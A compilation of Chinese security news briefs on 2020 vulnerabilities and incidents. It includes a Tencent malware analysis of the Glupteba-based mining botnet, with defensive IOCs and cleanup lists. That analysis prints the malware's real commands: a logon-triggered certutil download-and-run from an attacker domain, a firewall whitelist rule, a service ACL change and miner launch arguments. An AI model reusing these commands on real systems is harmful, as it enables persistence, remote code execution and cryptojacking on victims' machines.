谷歌的安全团队近日发现存在于Windows 10 May 2019（Version 1903）功能更新中的某个BUG，能够破坏所有基于Chromium浏览器的沙盒。想要利用这个漏洞发起攻击比较复杂，主要是更改操作系统代码中与安全令牌分配有关的代码。将“NewToken->ParentTokenId = OldToken->TokenId”更改为了“NewToken->ParentTokenId = OldToken->ParentTokenId;”。 在今天微软发布的安全公告(CVE-2020-0981 | Windows令牌安全特性绕过漏洞)对其进行了最简洁的解释： 当Windows无法正确处理令牌关系时，存在安全功能绕过漏洞。成功利用该漏洞的攻击者可以让具有一定完整性级别的应用程序在不同的完整性级别执行代码，从而导致沙盒逃脱。 谷歌的Project Zero安全团队发现了这个漏洞，如果被黑客利用能够绕过Chromium沙盒，运行任意代码。幸运的是，在本月补丁星期二活动日发布的累积更新（KB4549951）中，已经修复了这个漏洞。   （稿源：cnBeta，封面源自网络。）

目前微软共有47000多名开发人员，每月会产生将近30000个漏洞，而这些漏洞会存储在100多个AzureDevOps和GitHub仓库中，以便于在被黑客利用之前快速发现关键的漏洞。 微软的高级安全项目经理Scott Christiansen，大量的半策展（semi-curated）数据非常适合机器学习。自2001年以来，微软已经收集了1300万个工作项目和BUG。 Christiansen表示：“我们利用这些数据开发了一个流程和机器学习模型，它能在99%的时间内正确区分出安全和非安全漏洞，并能准确识别出关键的、高优先级的安全漏洞，97%的时间内准确识别出关键的、高优先级的安全漏洞。” 微软构建的机器学习模型中，旨在帮助开发者准确识别和优先处理需要修复的关键安全问题，并对其进行优先级排序。Christiansen表示：“我们的目标是建立一个机器学习系统，以尽可能接近安全专家的准确度将BUG分为安全/非安全和关键/非关键”。 为了实现这个目标，微软对学习模型进行了诸多培训，提供了很多标记为安全的BUG以及其他标记为不安全的BUG。该模型经过训练之后，能够基于掌握的信息来给没有被预先分类的数据打上标签。   （稿源：cnBeta，封面源自网络。）

微软今天发布了一个紧急安全更新，修复了存在于微软Office和Paint 3D应用中的多个漏洞。这些漏洞存在于使用Autodesk FBX库的微软应用中，而Autodesk官方也在4月15日为受影响的产品发布了修复补丁。 微软在其公告中解释说，攻击者如果成功利用上述漏洞，将能够获得与登录用户相同的权限，这意味着恶意行为者甚至可以在受影响的机器上获得管理员权限。 微软解释说：“在微软产品中存在多个远程代码执行漏洞，在处理某些特别制作的3D内容时调用FBX库就会出现问题。成功利用这些漏洞的攻击者可以获得与本地用户相同的用户权限。对于那些权限较少的用户来说影响可能会更小一些。” 微软表示：“要利用这些漏洞，攻击者必须向用户发送一个包含3D内容的特制文件，并说服用户打开该文件。本次发布的紧急安全更新通过修正微软软件已经修复了这些漏洞。” 这些安全补丁被评级为“重要”，据悉Microsoft Office 2016、Microsoft Office 2019和Office 365 ProPlus都受该漏洞影响。   （稿源：cnBeta，封面源自网络。）

OpenSSL 项目发布安全公告称存在一个影响 OpenSSL 1.1.1d, 1.1.1e 和 1.1.1f 的高危漏洞 (CVE-2020-1967)，该漏洞可被用于发起 DoS 攻击。根据官方对该漏洞的描述，在 TLS 1.3 握手期间或握手之后调用 SSL_check_chain() 函数的服务器或客户端应用可能会导致崩溃，原因是不正确处理”signature_algorithms_cert” TLS 扩展而引起的空指针引用。 如果从另一方接收到一个无效或未被识别的签名算法，则会发生崩溃。这可能会被恶意攻击者利用并发起 DoS 攻击。 该漏洞由 Bernd Edlinger 通过 GCC 中的新静态分析通道 -fanalyzer 发现，并已于2020年4月7日向 OpenSSL 报告。 对于受影响的 OpenSSL 1.1.1（1.1.1d，1.1.1e 和 1.1.1f）用户，建议尽可能快地升级到 1.1.1g。OpenSSL 1.1.1d 之前的版本不受此漏洞影响。 更早的版本如 OpenSSL 1.0.2 和 1.1.0 也均未受影响，不过这些版本都不再被支持，也无法再接受更新。建议使用这些版本的用户升级至 OpenSSL 1.1.1。   （稿源：开源中国，封面源自网络。）

谷歌已经为Chrome浏览器发布了一个紧急修复补丁，并敦促用户尽快安装。谷歌并没有透露有关于CVE-2020-6457漏洞的更多信息，只是确认为“use after free”类型漏洞。 该漏洞是由Sophos公司的安全研究人员发现的，据说是一个远程代码执行（RCE）漏洞。该漏洞允许攻击者在受害者不知情的情况下运行命令和未受信任的脚本。 安全研究员Paul Ducklin在一篇博文中表示，该漏洞将允许黑客 “改变你的程序内部的控制流，包括转移CPU来运行攻击者刚刚从外部戳入内存的非信任代码，从而绕过任何浏览器通常的安全检查或’你确定吗’对话框。” 此外他还表示该漏洞影响广泛，包括Windows、macOS和GNU/Linux用户多达20亿用户都可能受到影响。因此在大部分用户都已经安装该更新之后谷歌可能会公布更多的细节。 如果你是Google Chrome浏览器用户，那么你应该确保你运行的是v81.0.4044.113或以上版本。你可以通过访问帮助关于Google Chrome浏览器，检查更新和安装的版本。   (稿源：cnBeta，封面源自网络。）

OpenSSL 项目发布安全公告，披露了一个影响 OpenSSL v1.1.1d、1.1.1e 和 1.1.1f 的高危漏洞。该漏洞可被用于发动拒绝服务攻击。开发者称，在 TLS 1.3 握手期间或之后调用 SSL_check_chain() 函数的服务器或客户端应用可能会发生崩溃，原因是不正确处理 signature_algorithms_cert 扩展导致的空指针引用。 受影响的 OpenSSL 1.1.1 版本需要尽可能快的升级到  1.1.1g。该漏洞是 Bernd Edlinger 发现的，他在 4 月 7 日报告给 OpenSSL 项目。两周内释出补丁称得上很迅速了。   (稿源：solidot，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/mdgGiYwb722GuE6QtJTzPQ   一、概述 腾讯安全威胁情报中心检测到挖矿僵尸网络NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸网络会控制机器进行门罗币挖矿和搜集用户隐私数据，并具有远程执行命令的功能，同时还会利用比特币交易数据更新C2。 cloudnet.exe原来是Glupteba恶意木马，Glupteba最早作为Operation Windigo组织用于部署僵尸网络中的一部分首次出现，2018年6月腾讯安全威胁情报中心发现cloudnet.exe开始作为挖矿僵尸网络NSAGluptebaMiner的组件传播。 当前NSAGluptebaMiner版本具有以下特征： 利用永恒之蓝漏洞攻击传播； 安装计划任务实现持久化，任务利用certutil.exe下载木马； 利用密码提取器updateprofile.exe搜集浏览器记录的账号密码并上传； 绕过UAC，以管理员权限和系统权限运行，将木马程序加入防火墙策略白名单、Windows Defender查杀白名单； 安装驱动Winmon.sys、WinmonFS.sys、WinmonProcessMonitor.sys对木马进行保护； 运行门罗币挖矿程序wup.exe； 利用组件cloudnet.exe构建僵尸网络； 连接远程服务器，接收指令完成远控操作； 通过比特币交易数据更新C2地址。 二、详细分析 漏洞攻击成功后，Payload首先下载app.exe在内存中执行PE文件，并且将该文件释放到C:\Windows\rss\csrss.exe，csrss.exe是一个木马下载器，采用Go编程语言编写。 下载器首先获取当前应用程序信息、安装杀软信息、操作系统信息、硬件GPU、是否Admin用户，以及一些以二进制形式硬编码的信息来初始化“配置信息”，然后创建一个注册表项HKEY_CURRENT_USER\Software\Microsoft\<random>（8位随机字符）来存储所有获取的信息。（之前注册表为HKEY_USERS\ <sid>\Software\Microsoft\TestApp） 首先会检测是否在虚拟机中执行。 然后判断是否是系统权限，如果不是则通过以TrustedInstaller运行自己提高权限。 在”C:\Windows\System32\drivers\”目录下释放三个隐藏的sys文件，并加载对应的驱动程序： Winmon.sys用于隐藏对应PID进程； WinmonFS.sys隐藏指定文件或目录； WinmonProcessMonitor.sys查找指定进程，并关闭。 维护以系统服务的方式启动的木马（检查服务、下载安装服务、更新服务、删除服务）。 下载永恒之蓝漏洞漏洞利用程序，利用漏洞攻击局域网机器。 下载矿机和挖矿代理配置信息。 获取Glupteba僵尸网络代理程序Cloudnet.exe使用的下载地址和hash。 在handleCommand函数中实现后门功能，包括下载文件、程序执行等。 各函数及对应操作如下： 函数 操作 GetAppName 获取App名 IsAdmin 是否Admin账号 ProcessIsRunning 进程是否运行 Update 更新 Exec 执行程序 Download 下载 DownloadAndRun 下载并执行 DownloadAndRunExtended 下载并执行扩展 Exit 退出 UpdateData 更新数据 UpdateCloudnet 更新cloudnet.exe StopWUP 停止挖矿程序wup.exe UpdateService 更新服务 GetLogfileProxy 读取日志文件\proxy\t GetLogfileI2Pd 读取日志文件\i2pd\i2pd.log Notify 开启心跳包，在指定的时间间隔进行上报 NotifyHost 上报主机 EventExists 判断event是否存在 MutexExists 判断Mutuex是否存在 RegistryGetStartup 注册自启动项 VerifySignature 验证文件签名 RegistryGetStartupSignatures 验证启动项文件签名 VerifyProcessesSignatures 验证进程文件签名 GetUnverifiedFiles 上报未签名的文件 GetStatsWUP 获取挖矿木马统计信息 UploadFile 上传文件 Install 下载并安装 SC 截屏 UpdateCDN 更新C2 DiscoverElectrum 使用硬编码的以太币钱包，读取区块链交易数据 DiscoverBlockchaincom 从区块链交易数据中获取加密的新的C2地址 设置防火墙规则，将csrss.exe添加到白名单： `netsh advfirewall firewall add rule name=”csrss” dir=in action=allow program=”C:\Windows\rss\csrss.exe” enable=yes` 写入windows defender规则，添Winmon、WinmonFS、WinmonProcessMonitor加到白名单： cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)   安装名为“ScheduledUpdate”的计划任务，任务内容为：每当用户登陆时，利用certutil.exe下载app.exe，保存为scheduled.exe并运行： `schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR “cmd.exe /C certutil.exe -urlcache -split -f https[:]//biggames.online/app/app.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340” /TN ScheduledUpdate /F` 灵活更新C2： 通过公开的列表查询Electrum比特币钱包服务器，使用硬编码的hash值查询对应的区块链脚本hash记录，对返回的数据进行AES解密得到新的C2地址。 组件updateprofile.exe为密码提取器，也使用Go编写，并使用UPX壳保护。 运行后搜集包括Chrome，Opera和Yandex浏览器的cookie、历史记录和其他配置文件中的账号密码，打包上传到远程服务器。 组件cloudnet.exe负责构建僵尸网络， 会读取注册表中存放的UUID进行校验，在注册表“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本、路径等信息，移动自身到“\cloudnet\”文件夹下，连接C2服务器，接收远控指令。 组件wup.exe负责挖矿门罗币，csrss.exe启动wup.exe时传递参数 `C:\Users\Administrator\AppData\Local\Temp\wup\wup.exe -o stratum+tcp[:]//premiumprice.shop:50001 -u d244dab5-f080-4e0d-a79c-4eeb169b351b -p x –nicehash -k –api-port=3433 –api-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –http-port=3433 –http-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –donate-level=1 –randomx-wrmsr=-1 –background` Temp目录下的wup.exe负责下载矿机程序和挖矿配置文件，最后执行另一同名文件C:\Users\Administrator\AppData\Local\Temp\csrss\wup\xarch\wup.exe开启挖矿，该文件由开源挖矿程序XMRig编译。   三、安全建议 企业网管可以使用腾讯T-Sec终端安全管理系统清除病毒。 也可检查以下各项，如有进行清除： 目录和文件： C:\Users\Administrator\AppData\LoCal\Temp\Csrss\smb\ C:\users\administrator\appdata\loCal\temp\Csrss\ C:\Windows\rss\Csrss.exe C:\Windows\windefender.exe C:\Windows\System32\drivers\Winmon.sys C:\Windows\System32\drivers\WinmonFS.sys C:\Windows\System32\drivers\WinmonProCessMonitor.sys C:\users\administrator\appdata\loCal\temp\Csrss\Cloudnet.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\sCheduled.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\updateprofile.exe C:\Users\Administrator\AppData\LoCal\Temp\wup\wup.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\wup\xarCh\wup.exe 注册表： HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\TestApp HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\<random>\<random> HKEY_CURRENT_USER\SOFTWARE\EpiCNet InC.\CloudNet HKEY_CURRENT_USER\Software\MiCrosoft\<random> HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\Winmon HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonFS HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonProCessMonitor HKEY_USERS\sid\Software\MiCrosoft\Windows\CurrentVersion\Run\DeliCateFrost 计划任务： ScheduledUpdate IOCs Domain biggames.club biggames.online deepsound.live sndvoices.com 2makestorage.com infocarnames.ru URL http[:]//biggames.club/app/app.exe https[:]//infocarnames.ru/ru53332/-RTMD-AIyBxl2ebgAAvhwCAEVTFwAfAOm6EgMA.exe md5 b1c081429c23e3ef0268fd33e2fe79f9 da75bc9d4d74a7ae4883bfa66aa8e99b 00201e5ad4e27ff63ea32fb9a9bb2c2e 6918fd63f9ec3126b25ce7f059b7726a fcf8643ff7ffe5e236aa957d108958c9 9b47b9f19455bf56138ddb81c93b6c0c 0dbecc91932301ccc685b9272c717d61 矿池： premiumprice.shop:50001 参考链接 https://www.freebuf.com/articles/system/172929.html https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/

4月21日消息，据Android Police报道，近期不少人反映谷歌Pixel手机在运行部分APP时经常出现无响应的情况。报道指出，这是Android 10系统存在的Bug，该Bug不仅影响了谷歌Pixel设备，其它手机品牌也受到了不同程度的影响。 当APP出现无响应情况时，整个系统也会受到影响，导致整个系统不能操作，自然也就无法退出该应用程序，只能是强制锁屏，然后再解锁进入。 Android Police称该场景出现频率较高，一天可能要发生多次。受此影响的APP有YouTube、Twitter、亚马逊、YouTube音乐、Google Play商店等等。 更糟糕的是，这个Bug也影响到了Android 11。外媒发现运行Android 11开发者预览版的Pixel 3也同样遇到了这个问题，这说明Android 11开发版上有可能引入了Android 10稳定版上的错误代码。 目前Android Police已经与谷歌取得联系，但是谷歌尚未对此作出回应，预计问题会在下一版更新中解决。   （稿源：cnBeta，封面源自网络。）

备受争议的面部识别创业公司Clearview AI的安全漏洞意味着其源代码，一些秘密密钥和云存储凭据，甚至其应用程序的副本都可以公开访问。 TechCrunch报道说，网络安全公司SpiderSilk的首席安全官Mossab Hussein发现了Clearview AI一个暴露的服务器，他发现该服务器被配置为允许任何人注册为新用户并登录。 Clearview AI最早在1月份成为头条新闻，当时《纽约时报》的一次曝光详细介绍了其庞大的面部识别数据库，其中包括从网站和社交媒体平台上抓取的数十亿张图像。用户上传感兴趣的人的照片，Clearview AI的软件将尝试将其与数据库中任何相似的图像进行匹配，从而有可能从单个图像中揭示一个人的身份。 自从其作品公开以来，Clearview AI一直辩护说自己的软件仅适用于执法机构。但是，有报道称Clearview一直在向包括梅西百货和百思买在内的私营企业销售其系统。现在，此类不良的网络安全做法可能会使此功能强大的工具落入公司客户列表之外的不法之徒手中。 据TechCrunch称，该服务器包含公司面部识别数据库的源代码，以及允许访问其Windows，Mac，Android和iOS应用程序副本云存储的密钥和凭据。Mossab Hussein因此能够截取该公司iOS应用程序的屏幕截图，苹果公司最近因为违反其规则而阻止了该应用程序。Mossab Hussein还表示，他可以访问该公司的Slack令牌，这可能允许访问该公司的内部私人通讯。 Mossab Hussein还说，他从该公司的云存储中发现了大约7万个视频，这些视频是从一栋住宅楼中安装的摄像头拍摄的。 Clearview AI的创始人Hoan Ton-That告诉TechCrunch，这些镜头是在大楼管理层许可下捕获的，这是尝试制作安全摄像机原型的一部分。据报道该建筑物本身位于曼哈顿，但TechCrunch指出，负责该建筑物的房地产公司未回复置评请求。 针对网络安全故障，Clearview AI表示，未公开任何可识别个人身份的信息，搜索历史或生物识别信息并补充说公司已对服务器进行了全面的审核，以确认未发生其他未经授权的访问，这表明Mossab Hussein是唯一访问配置错误服务器的人，服务器公开的密钥也已更改，因此它们不再起作用。 上市后，Clearview AI的系统遭到了科技公司和美国当局的激烈批评。用于建立其数据库的平台（包括Facebook，Twitter和YouTube）已指示Clearview停止抓取图像，已告知警察部门不要使用该软件，佛蒙特州总检察长办公室最近针对该指控展开了调查。它可能违反了数据保护规则。   （稿源：cnBeta，封面源自网络。）

自新冠病毒疫情在美国蔓延以来，联邦调查局的网络犯罪投诉中心(IC3)接到的网络犯罪举报量激增，主要是因为美国国内和国际黑客试图在这个时间段进行各种网络攻击活动。 美国联邦调查局网络部副助理主任托尼娅·乌戈雷茨（Tonya Ugoretz）周四表示，IC3每天收到3000-4000起网络安全投诉，而在疫情爆发之前每天收到的投诉量维持在1000起左右。 本周四由Aspen Institute主办的网络研讨会上，乌戈雷茨表示：“我们的网络漏洞越来越多，也增加了威胁者利用这些漏洞的兴趣。” 乌戈雷茨表示许多黑客来自于那些“渴望深入了解”新冠肺炎相关研究的国家，而“远程工作的快速转变”已经为黑客提供了大量供他们利用的网络漏洞。 乌戈雷茨提到：“各国对有关病毒的信息非常感兴趣，例如关于疫苗的信息。我们的确发现有侦察活动，一些攻入那些机构的行为，尤其是那些公开表示自己在研究新冠肺炎的机构。” 乌戈雷茨称，研究潜在疗法或疫苗的机构公开宣传自己在做这件事情是合情合理的。但是她指出，“不好的一面是，这会让他们成为其他有兴趣搜集研究细节的国家的目标，这些国家甚至可能会窃取这些机构的知识产权信息。”她表示，FBI发现，这些由国家支持的黑客组织也试图攻入美国医疗保健系统。   （稿源：cnBeta，封面源自网络。）